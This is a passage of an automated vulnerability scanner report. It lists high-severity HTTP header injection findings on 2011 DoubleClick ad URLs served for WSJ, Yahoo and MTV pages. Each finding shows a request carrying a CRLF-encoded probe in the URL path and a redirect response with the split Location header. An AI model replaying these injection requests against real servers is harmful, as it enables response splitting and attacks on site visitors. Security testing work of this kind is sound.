The value of REST URL parameter 1 is copied into the Location response header. The payload f1e1b%0d%0a757e311c10f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f1e1b%0d%0a757e311c10f;src=490793;type=healt926;cat=snipp989;ord=7420981572940.945? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/f1e1b
757e311c10f;src=490793;type=healt926;cat=snipp989;ord=7420981572940.945:
Date: Tue, 14 Jun 2011 00:15:56 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2.2. http://ad.doubleclick.net/ad/N3282.wsj.com/B3951656 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3282.wsj.com/B3951656

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 20668%0d%0ab389d2ddde4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /20668%0d%0ab389d2ddde4/N3282.wsj.com/B3951656;sz=1x1;p=%9BKHUWN%A2;ord=3132099? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10001;mc=b2pfreezone;pos=2;tile=4;sz=170x67;ord=4904490449044904;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/20668
b389d2ddde4/N3282.wsj.com/B3951656;sz=1x1;p=.KHUWN.;ord=3132099:
Date: Tue, 14 Jun 2011 00:15:46 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2.3. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N447.153730.YAHOO.COM/B5548365.27

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 903fb%0d%0a38f723404aa was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /903fb%0d%0a38f723404aa/N447.153730.YAHOO.COM/B5548365.27;sz=200x33;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15mb2d4v4/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307981481/L=pCn7imKL8NLm3NorTdAdCwBurcHW8032GokAA_Py/B=FDJADWKL5Us-/J=1307974281291848/K=gRvxSKzfqEbroTIaTR.s5w/A=6407512/R=0/*;ord=0.04136643558740616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/903fb
38f723404aa/N447.153730.YAHOO.COM/B5548365.27;sz=200x33;dcopt=rcl;mtfIFPath=nofile;click=http: //global.ard.yahoo.com/SIG=15mb2d4v4/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307981481/L=pCn7imKL8NLm3NorTdAdCwBurcHW8032GokAA_Py/B=FDJADWKL5Us-/J=1307974281291848/K=gR
Date: Mon, 13 Jun 2011 14:13:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2.4. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/brokerbuttons.wsj.com/us_subscriber

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 778c8%0d%0a56e4198e1a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /778c8%0d%0a56e4198e1a/brokerbuttons.wsj.com/us_subscriber;;s=8_10001;mc=b2pfreezone;pos=1;tile=3;sz=170x67;ord=4904490449044904; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/778c8
56e4198e1a/brokerbuttons.wsj.com/us_subscriber;;s=8_10001;mc=b2pfreezone;pos=1;tile=3;sz=170x67;ord=4904490449044904;:
Date: Tue, 14 Jun 2011 00:15:58 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2.5. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 29a4b%0d%0aece2e9b9626 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /29a4b%0d%0aece2e9b9626/interactive.wsj.com/tech_front;u=%5E%5ElA;;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=4904490449044904; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/29a4b
ece2e9b9626/interactive.wsj.com/tech_front;u=^^lA;;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=4904490449044904;:
Date: Tue, 14 Jun 2011 00:15:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2.6. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_main_story

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2fbd2%0d%0a7f64288fd33 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2fbd2%0d%0a7f64288fd33/interactive.wsj.com/tech_main_story;u=%5E%5ElDlIlPlQlA;;msrc=WSJ_Tech_LEADTop;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=8210821082108210; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2fbd2
7f64288fd33/interactive.wsj.com/tech_main_story;u=^^lDlIlPlQlA;;msrc=WSJ_Tech_LEADTop;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=8210821082108210;:
Date: Tue, 14 Jun 2011 00:16:02 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2.7. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 16d55%0d%0a0e95c6c688f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /16d55%0d%0a0e95c6c688f/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!category=video;video_id=659420;partner=mv;content_id=1518072;pos=atf;tag=adi;mtype=standard;sz=728x90;tile=2;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;!category=mv;!category=partner;u=franchise-MTVMusicVideoPicksonOverdrive%7Cfranchise-MTVMusicVideoPicksonOverdrive%7Cartist-Mike_Taylor%7Cartist-Mike_Taylor%7C!category-expand%7C!category-float%7C!category-pop%7C!category-video%7Cvideo_id-659420%7Cpartner-mv%7Ccontent_id-1518072%7Cpos-atf%7Ctag-adi%7Cmtype-standard%7Csz-728x90%7Ctile-2%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7C!category-mv%7C!category-partner;ord=942670129658654300? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/16d55
0e95c6c688f/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!cate:
Date: Tue, 14 Jun 2011 00:18:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2.8. http://ad.doubleclick.net/adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 91475%0d%0ab926d5ec16 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /91475%0d%0ab926d5ec16/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!category=video;video_id=659420;partner=mv;content_id=1518072;pos=btf;tag=adi;mtype=standard;sz=300x250;tile=3;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;!category=mv;!category=partner;u=franchise-MTVMusicVideoPicksonOverdrive%7Cfranchise-MTVMusicVideoPicksonOverdrive%7Cartist-Mike_Taylor%7Cartist-Mike_Taylor%7C!category-expand%7C!category-float%7C!category-pop%7C!category-video%7Cvideo_id-659420%7Cpartner-mv%7Ccontent_id-1518072%7Cpos-btf%7Ctag-adi%7Cmtype-standard%7Csz-300x250%7Ctile-3%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7C!category-mv%7C!category-partner;ord=942670129658654300? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/91475
b926d5ec16/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!categ:
Date: Tue, 14 Jun 2011 00:18:52 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2.9. http://ad.doubleclick.net/adi/mtv.mtvi/survey [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/survey

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 22809%0d%0ab65a54cc41a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /22809%0d%0ab65a54cc41a/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/22809
b65a54cc41a/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100:
Date: Tue, 14 Jun 2011 00:17:47 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2.10. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_front [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/tech_front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 33fc2%0d%0a660ac79f9dc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /33fc2%0d%0a660ac79f9dc/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=6;sz=336x280,300x250;ord=4904490449044904; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=6;sz=336x280,300x250;ord=4904490449044904;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/33fc2
660ac79f9dc/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=6;sz=336x280,300x250;ord=4904490449044904;:
Date: Tue, 14 Jun 2011 00:15:56 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2.11. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/tech_main_story

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7dd09%0d%0ae73ef701a8c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7dd09%0d%0ae73ef701a8c/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7dd09
e73ef701a8c/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;:
Date: Tue, 14 Jun 2011 00:16:23 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2.12. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/music/_mn [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/atf_j_s/music/_mn

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 469eb%0d%0ae53c58461e1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /469eb%0d%0ae53c58461e1/mtv.mtvi/atf_j_s/music/_mn;sec0=music;sec1=_mn;!category=expand;!category=float;node=survey;pos=atf;tag=adj;mtype=standard;sz=6x6;tile=1;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;dcopt=ist;u=!category-expand%7C!category-float%7Cnode-survey%7Cpos-atf%7Ctag-adj%7Cmtype-standard%7Csz-6x6%7Ctile-1%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7Cdcopt-ist;ord=927227632701397000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/469eb
e53c58461e1/mtv.mtvi/atf_j_s/music/_mn;sec0=music;sec1=_mn;!category=expand;!category=float;node=survey;pos=atf;tag=adj;mtype=standard;sz=6x6;tile=1;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=:
Date: Tue, 14 Jun 2011 00:18:03 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2.13. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/atf_j_s/mv/videos/mike-taylor/_659420/perfect

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 66ca2%0d%0a4341a7674c7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /66ca2%0d%0a4341a7674c7/mtv.mtvi/atf_j_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!category=video;video_id=659420;partner=mv;content_id=1518072;pos=atf;tag=adj;mtype=standard;sz=6x6;tile=1;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;dcopt=ist;!category=mv;!category=partner;u=franchise-MTVMusicVideoPicksonOverdrive%7Cfranchise-MTVMusicVideoPicksonOverdrive%7Cartist-Mike_Taylor%7Cartist-Mike_Taylor%7C!category-expand%7C!category-float%7C!category-pop%7C!category-video%7Cvideo_id-659420%7Cpartner-mv%7Ccontent_id-1518072%7Cpos-atf%7Ctag-adj%7Cmtype-standard%7Csz-6x6%7Ctile-1%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7Cdcopt-ist%7C!category-mv%7C!category-partner;ord=942670129658654300? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/66ca2
4341a7674c7/mtv.mtvi/atf_j_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!cate:
Date: Tue, 14 Jun 2011 00:18:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2.14. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/_hp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/_hp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 25871%0d%0ae35eac74214 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /25871%0d%0ae35eac74214/mtv.mtvi/btf_j_s/_hp;sec0=_hp;!category=_hp;!category=float;!category=pop;!category=video;!category=expand;!category=pointroll;pos=btf;tag=adj;mtype=standard;sz=728x90;tile=3;u=!category-_hp%7C!category-float%7C!category-pop%7C!category-video%7C!category-expand%7C!category-pointroll%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-728x90%7Ctile-3;ord=892685005487874200? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/25871
e35eac74214/mtv.mtvi/btf_j_s/_hp;sec0=_hp;!category=_hp;!category=float;!category=pop;!category=video;!category=expand;!category=pointroll;pos=btf;tag=adj;mtype=standard;sz=728x90;tile=3;u=!category-_hp|!category-float|!category-pop|!category-video|!category-expand|!category-pointroll|pos-bt:
Date: Tue, 14 Jun 2011 00:17:17 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
